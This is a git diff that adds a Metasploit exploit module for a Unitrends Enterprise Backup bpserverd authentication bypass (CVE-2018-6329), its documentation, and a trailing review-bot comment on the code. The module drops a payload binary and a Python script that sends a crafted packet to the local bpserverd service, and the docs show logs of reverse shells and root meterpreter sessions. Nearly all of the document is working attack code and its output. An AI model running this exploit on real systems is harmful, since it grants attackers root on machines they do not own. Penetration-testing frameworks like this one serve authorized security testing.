diff --git a/documentation/modules/exploit/linux/local/ueb_bpserverd_privesc.rb b/documentation/modules/exploit/linux/local/ueb_bpserverd_privesc.rb
new file mode 100644
index 0000000000..f20c23f786
--- /dev/null
+++ b/documentation/modules/exploit/linux/local/ueb_bpserverd_privesc.rb
@@ -0,0 +1,95 @@
+## Vulnerable Application
+
+It was discovered that the Unitrends `bpserverd` proprietary protocol, as exposed via `xinetd`,
+has an issue in which its authentication can be bypassed. A remote attacker could use this
+issue to execute arbitrary commands with root privilege on the target system.
+This is very similar to `exploits/linux/misc/ueb9_bpserverd` however it runs against the
+`localhost` by dropping a python script on the local file system. Unitrends stopped
+`bpserverd` from listening remotely on version 10.
+
+## Vulnerable Application
+
+This module has been tested successfully on:
+ * UEB 9.2
+ * UEB 10.0
+
+## Verification Steps
+
+ 1. Get a user shell with `exploit/linux/http/ueb_api_rce` with `set target 1`
+ 2. ```use exploit/linux/local/ueb_bpserverd_privesc ```
+ 3. ```set session [SESSION]```
+ 4. ```exploit```
+ 5. A root meterpreter session should have been opened successfully
+
+## Scenarios
+
+### UEB 10.0 on CentOS 6.5
+
+```
+msf > use exploit/linux/local/ueb_priv_esc
+msf exploit(linux/local/ueb_priv_esc) > set session 4
+session => 4
+msf exploit(linux/local/ueb_priv_esc) > exploit
+
+[*] Started reverse TCP handler on 15.0.0.177:4444
+[*] Writing payload executable to '/tmp/pEFoythF'
+[*] Writing privesc script to '/tmp/CTZSovJR'
+[*] Fixing permissions
+[*] Sending stage (857352 bytes) to 10.20.1.202
+[*] Meterpreter session 5 opened (15.0.0.177:4444 -> 10.20.1.202:45188) at 2018-04-27 16:44:28 -0400
+[+] Deleted /tmp/pEFoythF
+[+] Deleted /tmp/CTZSovJR
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+```
+
+### UEB 9.2 on CentOS 6
+
+```
+resource (ueb_priv.rb)> use exploit/linux/http/ueb_api_rce
+resource (ueb_priv.rb)> set rhost 1.1.1.1
+rhost => 1.1.1.1
+resource (ueb_priv.rb)> set lhost 2.2.2.2
+lhost => 2.2.2.2
+resource (ueb_priv.rb)> set target 1
+target => 1
+resource (ueb_priv.rb)> run
+[*] Started reverse TCP handler on 2.2.2.2:4444
+[*] 1.1.1.1:443 - Sending requests to UEB...
+[*] Command Stager progress - 19.76% done (164/830 bytes)
+[*] Command Stager progress - 39.16% done (325/830 bytes)
+[*] Command Stager progress - 56.87% done (472/830 bytes)
+[*] Command Stager progress - 74.82% done (621/830 bytes)
+[*] Command Stager progress - 92.77% done (770/830 bytes)
+[*] Command Stager progress - 110.48% done (917/830 bytes)
+[*] Sending stage (861480 bytes) to 1.1.1.1
+[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:40216) at 2018-11-15 20:03:46 -0500
+[*] Command Stager progress - 126.63% done (1051/830 bytes)
+
+meterpreter > getuid
+Server username: uid=48, gid=48, euid=48, egid=48
+meterpreter > sysinfo
+Computer : 1.1.1.1
+OS : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64)
+Architecture : x64
+BuildTuple : i486-linux-musl
+Meterpreter : x86/linux
+meterpreter > background
+[*] Backgrounding session 1...
+resource (ueb_priv.rb)> use exploit/linux/local/ueb_bpserverd_privesc
+resource (ueb_priv.rb)> set session 1
+session => 1
+resource (ueb_priv.rb)> run
+
+[*] Started reverse TCP handler on 2.2.2.2:4444
+[*] Writing payload executable to '/tmp/.mM0iyQvoAO'
+[*] Writing privesc script to '/tmp/.sDjn0m'
+[*] Fixing permissions
+[*] Sending stage (861480 bytes) to 1.1.1.1
+[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:40219) at 2018-11-15 20:04:21 -0500
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+```
+
diff --git a/modules/exploits/linux/local/ueb_bpserverd_privesc.rb b/modules/exploits/linux/local/ueb_bpserverd_privesc.rb
new file mode 100644
index 0000000000..07c7b007c1
--- /dev/null
+++ b/modules/exploits/linux/local/ueb_bpserverd_privesc.rb
@@ -0,0 +1,160 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, { + 'Name' => 'Unitrends Enterprise Backup bpserverd Privilege Escalation', + 'Description' => %q{ + It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd, + has an issue in which its authentication can be bypassed. A remote attacker could use this + issue to execute arbitrary commands with root privilege on the target system. + This is very similar to exploits/linux/misc/ueb9_bpserverd however it runs against the + localhost by dropping a python script on the local file system. Unitrends stopped + bpserverd from listening remotely on version 10. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Cale Smith', # @0xC413 + 'Benny Husted', # @BennyHusted + 'Jared Arave', # @iotennui + 'h00die' # msf adaptations + ], + 'DisclosureDate' => 'Mar 14 2018', + 'Platform' => 'linux', + 'Arch' => [ARCH_X86], + 'References' => + [ + ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/000005691'], + ['URL', 'http://blog.redactedsec.net/exploits/2018/04/20/UEB9_tcp.html'], + ['EDB', '44297'], + ['CVE', '2018-6329'] + ], + 'Targets' => + [ + [ 'UEB <= 10.0', { } ] + ], + 'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 2 }, + 'SessionTypes' => ['shell', 'meterpreter'], + 'DefaultTarget' => 0 + } + )) + register_advanced_options([ + OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"]), + OptInt.new("BPSERVERDPORT", [true, "Port bpserverd is running on", 1743]) + ]) + end + + def exploit + + pl = generate_payload_exe + exe_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}" + print_status("Writing 
payload executable to '#{exe_path}'") + + write_file(exe_path, pl) + #register_file_for_cleanup(exe_path) + +pe_script = %Q{ +import socket +import binascii +import struct +import time +import sys + +RHOST = '127.0.0.1' +XINETDPORT = #{datastore['BPSERVERDPORT']} +cmd = "#{exe_path}" + +def recv_timeout(the_socket,timeout=2): + the_socket.setblocking(0) + total_data=[];data='';begin=time.time() + while 1: + #if you got some data, then break after wait sec + if total_data and time.time()-begin>timeout: + break + #if you got no data at all, wait a little longer + elif time.time()-begin>timeout*2: + break + try: + data=the_socket.recv(8192) + if data: + total_data.append(data) + begin=time.time() + else: + time.sleep(0.1) + except: + pass + return ''.join(total_data) + +print "[+] attempting to connect to xinetd on {0}:{1}".format(RHOST, str(XINETDPORT)) + +try: + s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s1.connect((RHOST,XINETDPORT)) +except: + print "[!] Failed to connect!" + exit() + +data = s1.recv(4096) +bpd_port = int(data[-8:-3]) + +try: + pass + s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s2.connect((RHOST, bpd_port)) +except: + print "[!] Failed to connect!" + s1.close() + exit() + +print "[+] Connected! 
Sending the following cmd to {0}:{1}".format(RHOST,str(XINETDPORT)) +print "[+] '{0}'".format(cmd) + +cmd_len = chr(len(cmd) + 3) +packet_len = chr(len(cmd) + 23) + +#https://github.com/rapid7/metasploit-framework/blob/76954957c740525cff2db5a60bcf936b4ee06c42/modules/exploits/linux/misc/ueb9_bpserverd.rb#L72 +packet = '\\xa5\\x52\\x00\\x2d' +packet += '\\x00' * 3 +packet += packet_len +packet += '\\x00' * 3 +packet += '\\x01' +packet += '\\x00' * 3 +packet += '\\x4c' +packet += '\\x00' * 3 +packet += cmd_len +packet += cmd +packet += '\\x00' * 3 + +s1.send(packet) + +data = recv_timeout(s2) + +print data + +s1.close() +} + + pes_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}" + print_status("Writing privesc script to '#{pes_path}'") + + write_file(pes_path, pe_script) + #register_file_for_cleanup(pes_path) + + print_status("Fixing permissions") + cmd_exec("chmod +x #{exe_path} #{pes_path}") + + vprint_status cmd_exec("python #{pes_path} -c '#{exe_path}'") + end + +end +
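Review bot: Both `#register_file_for_cleanup(exe_path)` and `#register_file_for_cleanup(pes_path)` in `exploit` are commented out, so although the module mixes in `Msf::Exploit::FileDropper`, the root-executing payload binary and the privesc script are left behind in `WritableDir` (world-readable `/tmp` by default) after the session opens; the "[+] Deleted" lines in the accompanying docs will not be produced by this code. Uncommenting the two `register_file_for_cleanup(...)` calls right after their `write_file` lines restores the cleanup and removes the artifacts. The script's length fields `cmd_len = chr(len(cmd) + 3)` and `packet_len = chr(len(cmd) + 23)` are single bytes, so a long `WritableDir` makes the Python 2 `chr()` raise and the packet malformed; a guard such as `fail_with(Failure::BadConfig, "#{exe_path} is too long for the bpserverd length byte") if exe_path.length > 232` before the script is built would surface that instead of a silent failure. The `-c '#{exe_path}'` argument on the final `cmd_exec` is never read by the script (the path is baked into `cmd = "#{exe_path}"`), so it can be dropped or the script should honour `sys.argv`.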